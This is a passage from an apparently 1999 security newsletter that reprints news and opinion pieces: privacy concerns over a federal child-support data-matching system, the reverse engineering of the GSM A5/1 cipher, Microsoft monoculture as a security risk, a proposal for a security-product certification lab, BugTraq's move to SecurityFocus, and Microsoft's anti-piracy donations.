Maryland. ``It has in some ways revolutionized this business.'' But privacy experts and civil libertarians say the scope of the effort raises new questions about the proper line between aggressive public policy and intrusive government snooping. In pursuing an objective that is almost universally applauded, the government has also created something that many Americans have staunchly opposed: a vast pool of fresh personal information that could be used in a variety of ways to monitor their lives. ``What you have here is a compilation of information that is much better and more current than any other data system in the U.S.,'' said Robert Gellman, an attorney and privacy specialist in Washington, D.C. ``All of the sudden we're on the verge of creating the Holy Grail of data collection, a central file on every American.'' Already lawmakers, federal agencies and the White House have considered expanding the permitted aims of the system to include pinpointing debtors, such as students who default on government loans. Under the system, every employer must send information about new hires and quarterly wages to state child-support agencies. State officials gather the data, along with information on unemployment benefits and child-support cases, and then ship it to computers run by the Administration for Children and Families. ACF officials then use computers to sort and send back to state authorities reports about people obligated to pay child support. Government officials say the system is safe, accurate and discreet. They also say it is secure. Because it has, among other safeguards, systems that confirm the accuracy of Social Security numbers, officials say it will not intrude into the lives of most people. An examination of the program, however, shows that government officials have downplayed or overlooked a variety of privacy and security concerns as they worked to meet congressional deadlines. The computer system that houses much of the data at the Social Security Administration ``has known weaknesses in the security of its information systems,'' according to a Dec. 31 report by the General Accounting Office. And authorities have not studied the frequency of mistakes that might arise from incorrect data, even though the system will enable local child-support enforcement officials to routinely freeze a parent's assets without an additional court hearing. Few people know about the system, even though it was created through one of the signature acts of Congress and the Clinton administration -- the ``Personal Responsibility and Work Opportunity Reconciliation Act of 1996,'' the law that ended the federal guarantee of welfare payments. Much of the congressional debate and news coverage at the time focused on the broad policy and political implications of the new law. Officials have not publicized their ability to obtain financial information because they do not want to alert delinquents to the ability of enforcement workers to seize or freeze financial assets, according to Michael Kharfen, spokesman for the federal Administration for Children and Families, which administers the program. -0- When welfare reformers on Capitol Hill and the White House approved the system in 1996, their aim was to cut down welfare spending by boosting child-support payments. (Begin Optional Trim) They had in mind people such as Stephanie Dudley and her son, Robert, who live in Farmington, Minn. Robert's father had split up with Dudley shortly after the boy was born and drifted from place to place. He owed $350 a month in child-support payments, but it was hard tracking him down and getting him to pay. Officials found Robert's father -- and then started withholding money from his paycheck -- after a new employer in Pennsylvania reported him to the network. ``I literally was living from check to check,'' Dudley said. ``I mean, that money literally put shoes on the kids' feet, helped pay the rent.'' Kathy Robins of Tazewell, Va., and her 7-year-old son, Dwight, never received court-ordered child support until the system turned up his father in North Carolina. Now she gets about $120 a month, money she plans to use to pay for a babysitter this summer. ``It'll help,'' she said. ``I mean, it's better than I was getting before, which was nothing.'' Child-support advocates contend that fears about privacy are overblown when weighed against such successes. (End Optional Trim) As of 1997, the latest year for which figures available, more than 7.4 million delinquents owed more than $43 billion in past child support. The system has helped boost support payments from $12 billion in 1996 to $14.4 billion last year, officials said. And in 1997, the burgeoning system helped enforcement programs locate more than 1.2 million delinquents. The system is essentially an electronic dragnet. It collects the names, Social Security numbers and other data about every newly hired employee in the nation from employers, who also must provide pay reports for most wage-earning adults. States ship along the names and other identifying information of people who receive state unemployment insurance. The Administration for Children and Families, a part of the Department of Health and Human Services, serves as a sort of clearinghouse that automatically matches all of that information against a file of nearly 12 million child support cases to locate parents obligated to pay support. Then the agency provides information about those parents -- no matter whether they are behind on payments -- to the appropriate state enforcement workers. The idea is to track the parents across state lines. Supporters of the system note that Congress explicitly restricted access to it. Those authorized to use the information include the Social Security Administration, which can use the directory of new hires to verify unemployment reports; the Treasury Department, which can use it to cross-reference tax-deduction claims; and researchers, who gain access only to anonymous data. Next month, financial institutions that operate in multiple states will begin comparing a list of more than 3 million known delinquents against their customer accounts. Under federal law, the institutions are obligated to return the names, Social Security numbers and account details of delinquents they turn up. The Administration for Children and Families will then forward that financial information to the appropriate states. For security reasons, Kharfen said, the agency will not mix the financial data with information about new hires, wages and the like. Bank account information will be deleted after 90 days. In a test run this spring, Wells Fargo identified 72,000 customers whom states have identified as delinquents. NationsBank found 74,000 alleged delinquents in its test. (Begin Optional Trim) Civil liberties activists say it would be a mistake to consider the system solely in terms of finding bad parents and making them pay up. They worry that the network sets a new standard for data surveillance by using computers to cross-reference hundreds of millions of personal records about Americans. Over the past quarter-century, since the Privacy Act was enacted in 1974, the federal government has tried to place limits on how its officials could compare databases to find or profile people. And in general, the government was supposed to limit data collection about people who paid taxes, received a federal benefit, served in the military or tangled with the judicial system. Critics say this new effort leaps beyond those practices by systematically creating centralized files about workers, wages and families, and sifting through those files to find a relatively small number of suspected deadbeats. The new registry of child-support cases, for example, now requires the names of all parents and children involved, even if they do not receive public assistance or ask for help in getting a problem resolved. The registry has information about nearly 12 million families. There is also concern about the government's reliance on private employers and financial institutions to watch citizens. A proposal last year to require banks to routinely track customer transactions for signs of criminal activity prompted an outpouring of protest. Regulators ditched the plan, called Know Your Customer, this spring after acknowledging they had misstepped. Taylor Burke, vice president of Burke & Herbert Bank & Trust Co. in Alexandria, Va., said he doesn't believe banks should be asked to watch their customers so closely on behalf of the government. ``We're all good citizens. But it doesn't mean we spy on our neighbors,'' Burke said. ``It's really scary.'' A review of the swift development of the system has turned up still other questions about whether the government paid enough attention to privacy -- particularly at a time when the issue has become a flash point in public policy debates across the country. As the system was phased in, officials posted federally required notices only in the Federal Register. No additional information has been added to W-4 forms that people must fill out when taking a new job. In addition to the issues raised by the GAO about the security of computer systems gathering and transmitting personal information, the systems in about a dozen states also have not been certified by federal officials as meeting security and privacy guidelines. Officials in OMB and the Administration for Children and Families sought to allay fears about mistakes. While acknowledging they have no idea about the likely rate of errors because no study was conducted, officials said the program verifies the accuracy of any Social Security numbers before sending data along to the states. In addition, officials said, individuals in every state will have an opportunity to appeal administrative actions. Virginia, for instance, will give parents up to 10 days before seizing assets, a state official said. Critics wonder what might happen to someone who is away on vacation or business. ``A Social Security number is not a bullet-proof identifier. There are always going to be mistakes,'' said Mary J. Culnan, a business professor at Georgetown University's McDonough School of Business, who drew an analogy to problems with the accuracy of credit reports in the early 1990s. Finally, the operation appears to be at odds with the Clinton administration's recent push to make privacy a priority. Last month, Clinton called on banks and other financial institutions to give consumers more control over how their information is gathered and used. ``President Clinton believes that consumers deserve notice and choice about the use of their personal information,'' said a White House memo about the event. (End Optional Trim) The assurances of officials do little to assuage the fears of people who worry about the potential ills of having a government that closely monitors its citizens. Such anxieties have been underscored by mistakes child-support enforcement workers have made in recent years. Last year, officials in Virginia had to apologize to 2,300 parents for misidentifying them as delinquent and announcing they would lose their hunting and fishing licenses. Officials attributed the mistake to a computer programming error. ``We're not perfect,'' a state official said at the time. California officials also misidentified hundreds of men after it began the federally mandated, data-driven crackdown on deadbeats. In some cases, they confused men who had similar names. ``In my estimation, this is going to be nothing more than a huge invasion of privacy,'' said James Dean of Oshkosh, Wis., who was unable to get a fishing license because he refused to provide his Social Security number. AP-NY-06-26-99 1916EDT @HWA 18.0 GSM Mobile Security is Cracked ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 29th From HNN http://www.hackernews.com/ contributed by Weld Pond The A5/1 over-the-air voice privacy algorithm used by almost all GSM digital phones is no longer secure. A5/1 is the algorithm used by GSM phones to encrypt communications. It is theorized that software to decrypt captured conversations will be available within a year. The COMP128 algorithm used to authenticate GSM phones for network access, was cracked last year. The Australian http://technology.news.com.au/techno/4221778.htm GSM mobile security is cracked By DAN TEBBUTT 22jun99 DIGITAL mobile phone users could soon face the threat of eavesdropping, following a breakthrough reverse engineering effort in the United States. Three California researchers say they have cloned the secret encryption method used to secure Global System for Mobile (GSM) communications. Research leader Marc Briceno predicted unscrambling software could appear before the end of the year, following academic papers studying possible faults in the A5/1 over-the-air voice privacy algorithm. This standard is used in nearly all digital mobile phones in Australia. Inherent flaws in the security technology suggested special cracking hardware devices could unscramble GSM conversations within seconds, according to Mr Briceno, director of the US-based Smartcard Developers Association. A network of personal computers could unlock the encryption method within a matter of hours. "Mobile users should be worried about this," he said. "Calls can be intercepted by a moderately motivated adversary who by no means needs to be a cryptography expert. "The telecommunications providers' promise that GSM is secure with respect to random listeners can certainly no longer be maintained." The reverse engineering project would allow greater public scrutiny over closely guarded GSM security technologies, he said. The reference implementation would allow academic cryptographers to probe for deficiencies in A5/1. "Once the holes are found, any competent programmer can write an implementation to exploit those shortcomings." Vodafone technical director Jonathan Withers warned against over-stating theoretical problems. "Practical attacks are pretty hard," he said. But Mr Withers confirmed that GSM security standards were watered down after concerns were raised by law enforcement agencies. "A5/1 is set at a level that is deemed appropriate and acceptable by law enforcement," he said. Telstra and Optus representatives declined to comment. Australian Communications Authority standards and compliance manager Grant Symons defended digital security as adequate for the job. "The GSM algorithm has proven its worth for people engaged in everyday business and social activities. We're not talking about the military here," he said. Mr Briceno said the synthesised algorithm was so functionally similar to the real A5/1 code that it could complete published GSM encryption benchmarks. Last year he was part of a University of California, Berkeley, team that broke the COMP128 algorithm used to authenticate GSM phones for network access – prompting fears of billing fraud on digital mobile phones. "In a business environment, where people believe their call is secure, the cost of eavesdropping could be a lot more than a few dollars on a phone bill," Mr Briceno said. @HWA 19.0 Microsoft Mono-culture Poses National Security Risk ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 29th From HNN http://www.hackernews.com/ contributed by Adam This article asks the right question "Is Microsoft a threat to national security?" but misses a few key points. The threat is worse than this article says. Remember Melissa made it on board a Navy ship and jumped the supposed air-gap onto SIPRNet two things that could not have happened if the military was not dependent on one company's productsts. The article talks about a CyberUL type of organization, this idea has been around for a while and was first proposed by Tan. Oh, and the part of a Mac being unhackable, don't believe it. Forbes http://www.forbes.com/penenberg/ CyberUL Proposal- By Tan http://www.l0pht.com/cyberul.html HNN Archive for March 31, 1999- Melissa on board 7th Fleet http://www.hackernews.com/arch.html?033199#3 HNN Archive for April 5, 1999- Melissa Jumps AirGap onto SIPRNet http://www.hackernews.com/arch.html?040599#2 Forbes; Is Microsoft a threat to national security? IN SEPTEMBER 1997, the USS Yorktown, the Navy's first "smart ship," was conducting routine maneuvers off Cape Charles, Va. Things were fine until the onboard computer system, powered by Microsoft NT software, crashed, leaving the ship dead in the water for 2 hours and 45 minutes. Communications were knocked out. Weapons systems were down. The propulsion system wouldn't restart. If you think rebooting your laptop after it freezes is a drag, how would you like to try and reboot an entire battle cruiser? Was it sabotage or an electromagnetic pulse? Nothing so dramatic: The computer was simply asked to divide by zero. Officials were quick to exonerate Microsoft for the glitch, claiming it was human error, and the Navy continues to install Windows NT servers on all its cruisers and destroyers, some 84 ships in all. Perhaps Navy brass haven't heard the joke making the rounds in military computer circles: What does NT stand for? Needs towing. The question is, What would have happened if this had occurred in battle? Of course, the Navy should modernize its fleet, incorporating the best computer technology this nation's geeks can create within the fabric of its ships. Should the Navy rely on Microsoft products, which have proved to be unstable, unreliable, hard to troubleshoot and riddled with security holes? It is ironic that as one part of the U.S. government goes after Microsoft in court, accusing it of monopolistic practices, Microsoft is quietly gaining a monopoly over another part. Hackers--and now virus makers--have long delighted in taunting the "Satan from Redmond," churning out software programs that exploit holes in Microsoft products. Some of them have deliciously crude names, too, like Back Orifice, a software program originally created by a group called The Cult of the Dead Cow. Because Back Orifice enables a user to control and monitor a Windows operating system over a network without being detected, it is on just about every good hacker's laptop. It is easy to find--type it into almost any search engine and you'll encounter lists of sites that offer it as a free download. What is particularly distressing is the emergence of the Microsoft mono-technology culture, in which its many products are tightly bundled together--Windows OS plus Microsoft Excel plus Microsoft Word plus Microsoft Outlook E-mail could very well equal big trouble. As Microsoft's dominance grows, Microsoft users become even more vulnerable. Case in point: In March, the Melissa virus swept America, spreading when a user opened an attached Microsoft Word file. Upon activation, it looked for Outlook--Microsoft's E-mail, newsreader and personal information manager--created a message, and sent it to the first 50 people listed in the user's address book. Thankfully, the virus did not destroy or alter data, or trash hard drives, but it did flood networks with E-mail. This was not true of "Explore.exe," an Internet worm named for the file that launches it. In June, Explore.exe erased billions of gigs of information around the world. Melissa and Explore.exe received wide coverage in the media, but you may not have heard of the most recent Microsoft security hole in Microsoft's Internet Information Server, which, according to eEye Digital Security Team, left approximately 90% of 1.3 million Microsoft web servers vulnerable to hack attacks. It seems that as soon as Microsoft develops a patch to combat a new exploit, someone comes up with a new one. By the time you read this column, I wouldn't doubt that more holes will be identified and plugged. "No one knows what evil lurks in these 40 million lines of Windows NT code," says Rick Forno, author of The Art of Information Warfare. "You have to roll the dice and take your chances." His solution: Buy a Mac. They are virtually unhackable, he says. And he's not kidding. But Forno, who truly believes that Microsoft is a threat to our nation's security, has other ideas, too. He proposes a kind of software version of the Underwriters Laboratory, a not-for-profit product safety testing group for electronics that has been around since 1894. It is responsible for the "UL-approved" stickers you see on lamps, Christmas tree lights and clock radios. As for me, I'd like to change the model by which software companies peddle their products. Instead of allowing them to license software, which lets them dodge responsibility for poor quality, software vendors should be held liable for glitches that lead to security snafus and crashes. If you bought a car with locks on the door that didn't work properly, odds are the manufacturer would be held liable. So should software makers. In addition, the government, and corporations, could lessen the impact of the next round of Melissa viruses or Explore.exe worms by relying on more than one operating system. The less we depend on one type of operating system, the less vulnerable we are. Of course, this runs smack into Bill Gates' monopolistic vision: to place Windows on every computer, PDA, Navy ship and toaster. But Gates is only the richest man in the world, not the only software vendor in town. And that's how he should be treated. Do you think heavy reliance on Microsoft products threatens our national security? Let me know in my forum. Related links: The Art of Information Warfare http://www.taoiw.org Underwriters Laboratory http://www.ul.com CyberUL Proposal- By Tan (Reprint) Cyberspace Underwriters Laboratories [2]tan@l0pht.com Cyberspace Underwriters Laboratories - 01/11/1999 Underwriters Laboratory Underwriters Laboratories was founded in 1894 by an electrical inspector from Boston, William Henry Merrill. In 1893, Chicago authorities grew concerned over the public safety due to the proliferation of untamed DC circuits and the new, even more dangerous technology of AC circuits. These new and little-understood technologies threatened our society with frequent fires which caused critics to question if the technology could ever be harnessed safely. Merrill was called in and setup a one-room laboratory with $350.00 in electrical test equipment and published his first report on March 24, 1894. Back in Boston, insurance underwriters rejected Merrill's plans for a non-biased testing facility for certification of electrical devices. Chicago however, embraced the idea. Merrill took advantage of the situation in Chicago to get up and running and within months had support at the national level. Today, UL has tested over 12,500 products world-wide and is a internationally recognized authority on safety and technology. The UL mark of approval has come to provide an earned level of trust between customers and manufacturers and safely allowed our society to leverage hundreds of inventions that would have otherwise been unfit for public use. While originally targeting inventions which could potentially cause physical harm to the user, the UL has expanded into the listing of alarm system products as well as alarm system installers. Individual products are listed as meeting UL standards and the companies that install those products are also listed as qualified to install the product as intended. Insurance companies have leveraged the UL's scrutiny to properly ascertain their risks. Cyberspace Today, technology continues to grow at a rapid pace, perhaps even out of control. The commercialization of the Internet has led many businesses to offer services out there in what has been called the Wild Wild West (WWW). As a result, the public safety is at risk. Utilities are bridging control systems to Internet attached back-office systems. Banks are offering 'cyber-banking' and merchants are collecting information about consumers as they transact their business over the Web. Individual privacy and the fiduciary trust banks and merchants have established over hundreds of years are open to new threats as these activities become more and more prevalent. Similarly to early electrical inventions, today's computer security products may introduce more harm than good when implemented by end users. While some of these products do what they claim, most do not. The lack of standards and meaningful certification has allowed the sale of products that are either intentionally or unintentionally snake-oil. While many of the products may solve old problems and inadvertently introduce worse ones, some just do not perform as advertised at all. For instance, some products have been marketed as utilizing the latest and greatest encryption mechanisms when in fact, the version they are selling does not utilize any encryption at all. Just as in the late 1800's, the consumers have little understanding of the inventions they are purchasing. They are presented with claims by the product's marketers and have no way of proving those claims to be true or false. Just as it was back then, this has not stopped the large-scale application of these inventions, regardless of public safety. In the late 1900's, nobody has stepped up to the plate to expand the UL's role into computer security products or to take that role as their own. To some extent, groups like Nomad Mobile Research Center and L0pht Heavy Industries have acted as modern day Merrill's, publishing non-biased findings to this affect. This is not to say that certification of computer security products has not been attempted in the past. ICSA for instance, operates a certification program for products. CISSP and other organizations also offer certification of information security professionals. These organizations however, have failed drastically at providing what the UL has provided on a more general 'technology' level. These failures could be examined in detail but such an excersise is outside the scope of this article. The bottom line for ICSA is that it does not have the rigorous standards that the UL has and its credibility has suffered as a result. ICSA fails to see the certification process as ongoing or cyclical allowing for products to inherit their 'certification'. As a result, it is believed by some that there is a problem in that there is a lack of non-biased inspection of software and that money buys more certifications than good product design and implementation. CISSP certifies individuals in the computer security industry. While sorting out those who are fluent in the industry jargin and concept, the work of CISSP's still lacks accountability in that their certification is tied to a test rather than what the UL referrs to as a 'field counter-check'. Like most computer certifications however, this is simply a test of test-taking skills rather than a test of experience and understanding. Cyber-UL Product certification needs to be performed on every version of a product. Small changes that could ripple through traditional technologies causing safety problems are at least ten fold when applied to computer software. Many similarities may be drawn between the certification of computer security products and the listing of alarm systems and components that UL performs today. UL has a stringent set of tests which are performed on physical security systems which seek UL listing. For instance, safes and vaults have a number of different labels which indicate their adherence to different standards. UL utilizes 'young hotshot' safe-crackers wishing to make a name for themselves, to do the actual testing. This way, specialists are motivated (by not only fame but by financial compensation as well) to validate the claims that the vendors' marketing people want to make. The entire safe and vault business operates around these ratings to communicate to the customer what it is that the product was designed to do. Based on value and risk, a customer may choose to spend more or less on higher or lower rated labels. The two major factors which influence the level of rating are time and tools. The 'hotshot' safe-crackers are given samples of the product and guidelines for their attempts to defeat its security. For instance, a TL-30 rating means that the cracker is limited to tools not including torches or explosives and is given 30 minutes of actual working time to defeat the security. If X6 is appended to the rating, the rating applies to not only the door, but the container (the rest of the safe). This aligns the vendor's claims to the actual performance of the product. Also, if a new version of the safe comes out, it does not inherit the old version's listing, it must be re-listed. This addresses a big problem that was sure to arise with safe vendors and has definitely risen in the computer security arena. Customers, due to human nature, want products to be certified as 'secure'. Just as customers like to hear promises of security, vendors love to make them. In 1913, UL tested the first 'security devices'. With this expansion into security devices, they recognized the need to replace the word 'Approved' with the words 'Inspected' or 'Listed'. Due to what UL has established with security devices, customers are not lulled into a false sense of security and vendors do not make outrageous claims. Customers are presented with 'product x is rated at rating y' rather than 'its ICSA certified'. Vendors claim to be resistant to certain toolsets for certain amounts of time. This is not what the computer security field looks like today, but is where it needs to go. The manufacturer and consumer must realize that testing 'security' is not the same as testing 'functionality' and because of that, claims need to be adjusted to fit reality. If a door-knob opens a door, the door works. If a safe-lock opens when you dial the combination, it does not mean the safe works. You can however, perform tests on the safe to assure that it operates as advertised within certain heat and force constraints. While listing individual devices as meeting UL standards is useful to a security professional or consumer, it is only a small part of the picture. Installation and configuration of components is critical to the actual effectiveness of the security solution. For this reason, installation of alarm systems is another area of influence for the UL. This may seem like a daunting task since the number of implementations is exponential to the number of products. UL has, with only about 4,000 employees, listed more than 12,500 products in over 40 countries and developed over 600 standards for product safety. The tact taken to assure the correct installation of alarm systems has been to list alarm installation companies. Systems installed by UL listed companies may qualify for a UL issued certificate. The certificate registers the customer's alarm system becomes an eligible candidate for 'field counter-checks' (spot-audits) which are performed to assure that listed installers are not cutting corners. If a system which has received a certificate fails the field counter-check, the installer could potentially loose their UL listing. The UL has maintained a quality program by scaling the number of field counter-checks as needed. Problems with the model While the UL model for security devices seems to address many of the same issues that surround Cyberspace, there are a number of problems with deploying the model for computer security devices as it stands. The first problem is that if a security system is defeated in the physical world, it is typically very obvious to those who come into work on Monday and see that the money is gone and the safe is in pieces. Detection of a cyber intrusion is typically NOT very obvious to those who come into work on Monday. Because of this fact, safe-crackers have very limited time to crack a vault. Hackers on the other hand, have unlimited time to crack a system. Once they get in, safe crackers typically REMOVE items which then become 'missing'. Hackers typically COPY items unless their motives are political rather than financial, leaving the originals and the system intact. For cyber intrusions to become less surreptitious, intrusion detection needs to mature and become more widely deployed if 'time' is to be a meaningful factor in the process. The commercial model is based around the storage of valuables, particularly jewelry and cash. In addition to the (American) UL standards (TL-15, TL-30, TRTL-30, TRTL-15/6, TRTL-30/6, TXTL-60), there is a German standard (A,B,C1,C2,D 10, D20, E 10) and a Scandinavian standard (60-80, 80-100, 100-120, 120-140, 140-160, 160-180, 180-200, 200-240, 240-280, 280-320, 320-360). All three are based on time and tools. Time and tools is an excellent set of criteria for rating computer security components in areas such as encryption. In America, the various insurance agencies determine what rating is required for them to insure a given amount to be stored in the safe or vault. In Europe, the Dutch Safe Rating Committee publishes a similar standard assigning a range of financial value to each rating in each of the three systems. This does not, however, address liability for storage of information such as credit ratings, social security numbers, bank balances, web surfing preferences, political affiliations, which is subject not only to theft but to alteration or even just surreptitious access. When storing sensitive information, a more appropriate place to look for examples is to the government. Classified information presents many of the same requirements for storage that sensitive information on the public or even commercial interests. To meet the U.S. Government's needs in this area, General Services Administration (GSA) has published standards (classes 1-8, black, red, green and blue labels) which rate storage containers for everything from weapons to information processing systems to filing cabinets. They additionally publish information on storage of confidential, secret, and top-secret materials in GSA Approved (or Non-GSA Approved) containers. This information includes additional requirements for alarm systems, restricted building access, guard check points, etc... Specifics on GSA classes and labels are seemingly difficult to come by. Based on the information I have found in the document library of locks.nfsec.navy.mil/document_library/guides however, much of what has been worked out by the GSA could potentially serve as a foundation for developing similar standards for the storage of information on the public. The U.S. Department of Commerce has commissioned the National Institute of Standards and Technology (NIST) to maintain FIPS PUB 140-1, Security Requirements For Cryptographic Modules. The document sets forth a standard for specification of cryptographic-based security systems protecting unclassified information. It provides for product ratings from 1 to 4 with 1 being lame and 4 being k-rad. This range is designed to cover a wide range of data sensitivity, from 'low value administrative data' to 'million dollar funds transfers' to 'life protecting data'. The standard is typically utilized for devices which protect tokens or encrypt data such as crypto boxes. While this system may or may not be successful in real life, it certainly deserves closer examination in that it represents what may be the closest thing that the U.S. Government has to UL for computer security products. Under the FIPS 140-1 Testing and Validation model, vendors select an accredited FIPS 140-1 testing lab, submit their 'module' for testing and pay the testing fee. The lab then tests the product for conformance to FIPS 140-1 and passes a report on the 'module' to NIST/CSE for validation. Throughout this process, the lab may submit questions for guidance and clarification to NIST/CSE. If the report is favorable, a validation certificate is issued by NIST/CSE for the 'module'. The certificate is presented to the vendor through the lab and the 'module' is added to the published list of Validated FIPS 140-1 Modules. The problem may stem from the difference between UL's roots and those of ICSA and CISSP. It certainly manifested itself in the fact that the UL is the only one providing non-biased product inspections as well as accountability for the quality of the installations out there in the field. Requirements for the use of 'listed' intrusion detection systems, encryption mechanisms, and companies could on its own make an impact if that listing actually meant something. The use of strict procedures and specific levels of physical security could be required as in the GSA model and this too could help the private sector. This has not been the tact taken to date, however. The second problem is that manufacturers of physical security devices are pressured by customers to have a UL listing. This is because customers are pressured by insurance underwriters to use products that meet UL specifications. In Cyberspace, businesses currently feel that the embarrassment and loss of public trust are more costly than the actual damage caused by hackers. Citibank has become the most well-known example of what happens when computer intrusions are made public knowledge. By taking commendable actions and not covering up the intrusion, Citibank is now known as the bank that got hacked instead of the bank that handled the situation appropriately. Since silence seems to be the best policy, cyber merchants choose to 'eat' their losses rather than risk the negative publicity. Until these losses become intolerable and insurance is necessary, there may be no motivation to drive the certification, approval or listing of products by UL or any similar organization. It took UL about 30 years from being subsidized by the insurance agencies to being self-supporting off fees paid by manufacturers for testing. Merrill was the first full-time employee as a result of this change. Insurance underwriters and Consumer Product Safety Commission were instrumental in gaining public acceptance of UL work. It was the public's safety that was of concern and liability drove companies to insure. Insurance underwriters found they were then saddled with the problem and addressed it effectively with the UL. Perhaps at some point the collection and storage of information on the public will carry some sort of liability with it. A Call for Action Without a call for action, I would simply be a whiner. At this point, you the reader can assist with very little effort. Whether you are a vendor, insurance company, end user, or hacker, let me know your thoughts on the state of the industry, the state of the UL and/or this article's conclusions. As a hacker, is the relationship between the hot-shot safe crackers and the UL an attractive one you would be interested in? Is the UL listing process for installations sufficient? Will it encounter problems unforeseen by this article? As an insurer, am I missing part of the picture; are companies actually insuring their computer systems and data to mitigate loss or liability? As a manufacturer do you foresee problems with the UL model being imposed on computer security products? As an end user do you feel that computer security is important? Do you feel that the current system actually is sufficient? Have you been wanting something better or do you feel that you are being slighted by my insinuation that you do not fully understand the products you purchase? Any and all feedback on this article would be appreciated no matter where it comes from (although manufacturer comments will be taken with a grain of salt). Forward those comments to tan@l0pht.com. If there is enough feedback, I may write a follow up article on this topic. I am considering going into detail on each rating system UL, German, Scandinavian, GSA and FIPS 140-1, highlighting overlaps with the computer security discepline. Thanks to the UL for providing documentation on the history of the UL and directing me to Peter Tallman of the Melville, N.Y. office. Thanks to Peter Tallman for clarifying some of the issues surrounding the listing of safes and alarm systems and directing me to Beverly Borowski whom I hope can assist me in my future research. Also of use to date was FED-STD-809, the federal standard for neutralization and repair of GSA approved containers as well as a yearly publication by the Dutch Safe Rating Committee called 'Recommendations for Insuring Money in Safes and Strongrooms'. GSA's web site (www.gsa.gov) provides a searchable index of federal standards including FED-STD-809. The Dutch Safe Rating Committee is at Stichting Kwaliteitsbeoordeling Brandkasten (SKB), P.O. Box 85764, 2508 CL The Hague, The Netherlands - Tel. 070-3912008. Additional thanks to the researchers at the L0pht for their assistance, particularly to Brian Oblivion for providing extensive documentation on FIPS 140-1. @HWA 20.0 BugTraq Moves To SecurityFocus ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 29th From HNN http://www.hackernews.com/ contributed by Aleph One BUGTRAQ, the premier security mailing list, will officially be moving from its current home at Netspace.org to Securityfocus.com on July 5th. Security Focus will be a major security web site featuring complete BugTraq archives, Daily News, vulnerability information and lots lots more. Security-Focus http://www.securityfocus.com InfoWorld http://www.infoworld.com/articles/op/xml/990628opswatch.xml Security Watch | Stuart McClure and Joel Scambray Portals open on security landscape AS SECURITY GROWS into a major concern for IT shops, a number of online security portals have sprouted up. These offer nearly everything you'll need to manage security at your site. A number of Web pages have begun in the last couple of months, but the most impressive ones are just now opening. We have frequented many in our security travels, and we think that Securityfocus.com, a site debuting the week of June 26, looks the most promising for providing comprehensive and one-stop security information. Since we started Security Watch more than a year ago, we've seen our column's name borrowed by a number of people. Now you'll have to add Securitywatch.com, in Belgium, to that list (www.securitywatch.com). According to its semiveiled Web page, the site will debut July 5 and will offer the usual security news, products, trends, jobs, literature, and links. But, like Securityfocus.com, Securitywatch.com also promises a vulnerability database. The depth and breadth of its vulnerability archive remains to be seen, however, as we have yet to receive an offer to preview this site (surprise, surprise). One of the earliest collections of security resources on the Internet came from SecuriTeam.com. The site has been available for more than a few months and offers security news, reviews, exploits, and tools. Although its content isn't as complete or as well organized as that of some others, it offers a decent set of security resources and timely vulnerabilities that we have frequented and highly recommend checking out. SecurityPortal.com has been around for a number of months and offers a fairly good set of security content including a weekly column, security news, discussion forums, services, a research center (links and resources), and even an online store. It also offers a centralized location to search for computer security jobs at all the major career sites, including Career Builder, Career Mosaic, and Monster Board. SecureZone.com is a relative newcomer and at first glance looks much like a general search engine. The site offers a variety of security information and resources, and even allows you to add your URL to its site. But unlike Securityfocus.com and Securitywatch.com, SecureZone does not offer its own vulnerability database. Also, we experienced delays when using the site; be prepared for a wait. The site is run by En Garde Systems (www.engarde.com), the product vendor that offers the nifty security software T-Sight and IP-Watcher. The heavy hitter Combine the Bugtraq archive (www.geek-girl.com), Packet Storm's exploits and tools (www.genocide2600.com/~tattooman), and Hacker News Network's timely news (www.hackernews.com), and you'll barely scratch the surface of the content provided on Securityfocus.com (www.securityfocus.com). The new Web site should be up this week and will offer one of the best collections of security resources available on the Internet. We got a sneak peak at this site and were duly impressed. For starters, Securityfocus. com offers one of the most up-to-date security news sections available. Also included on the site are security tools, products, books, an events calendar, and forums. But unlike many of its competitors, Securityfocus.com offers a robust -- and free -- vulnerability database. The site also lets you query for only the technology that's important to you. For example, if you're primarily a Solaris 2.51 shop running Netscape Enterprise Server, you can query only the relevant vulnerabilities. You can personalize the entire Web site by selecting the type of news, calendar events, products, tools, and vulnerabilities you care about. Securityfocus.com will also provide a free applet for your desktop that will warn you as soon as a relevant vulnerability is released. Securityfocus.com is the brainchild of the original Secure Networks group. The team created the Ballista security scanner product (now named CyberCop Scanner from Network Associates) and has discovered numerous product vulnerabilities on its own. Aleph One, the moderator and caretaker of the Bugtraq mailing list (one of the most widely subscribed computer lists in the world), has added his muscle to the site in offering the entire Bugtraq archive as part of the vulnerability database. Also, the entire Bugtraq mailing list will be moved to Securityfocus.com so archives can be searched. After witnessing the birth of so many security portals on the Internet during the past year, we can't help but wonder what's next for the security community. Personally, we wouldn't mind seeing the paging service that warns administrators about new vulnerabilities the minute they become public, or maybe the downloading of daily security news to your Pilot with AvantGo (www.avantgo.com). In any case, the future is definitely bright for security professionals. Check out these portals and let us know which ones you'll be visiting at security_watch@infoworld.com. Stuart McClure is a senior manager and Joel Scambray is a manager at Ernst & Young's eSecurity Solutions group. They have managed information security in academic, corporate, and government environment @HWA 21.0 MS Gives Out Pirate Dough ~~~~~~~~~~~~~~~~~~~~~~~~~~ June 29th From HNN http://www.hackernews.com/ contributed by Code Kid Microsoft is planning to give away up to $25 million over the next five years, or half of it proceeds from its antipiracy efforts, toward technology access and education projects around the world. MS estimates that it will receive aprox $10 million in civil and criminal antipiracy proceeds annually over the next five years. Wired http://www.wired.com/news/news/business/story/20469.html Microsoft Shares Piracy Loot Reuters 3:00 a.m. 29.Jun.99.PDT Microsoft plans to give away half its proceeds from efforts to crack down on software piracy, or at least US$25 million over the next five years, a company executive said. Brad Smith, general counsel for worldwide sales and support for Microsoft, said the software company is seeing a growing stream of revenue from settlements and criminal penalties assessed against counterfeiters. See also: Germany Jails Software Pirate "Obviously we rely heavily on law enforcement for support," Smith said. "Given that support from the public sector, we felt it was proper to share some of these recoveries with the communities that, like the company, are suffering from piracy." He said that Microsoft, which had $14.5 billion in revenues last year, expects at least $10 million in civil and criminal antipiracy proceeds annually over the next five years, although he said the company is spending more than that on efforts to enforce software laws. Smith said piracy is not necessarily growing, but authorities are increasing their enforcement in part because many large counterfeiting operations are connected to organized crime. "The reason we go after it so much is because we're cutting off a major source of funding for criminal syndicates," said Marc Frank, a Westminster, California, police sergeant who heads the multi-agency Asian Organized Crime Task Force. "It's not because we're the Microsoft police," he said. "It's because we're hitting the organized criminal syndicate where it hurts them -- in the pocketbook." 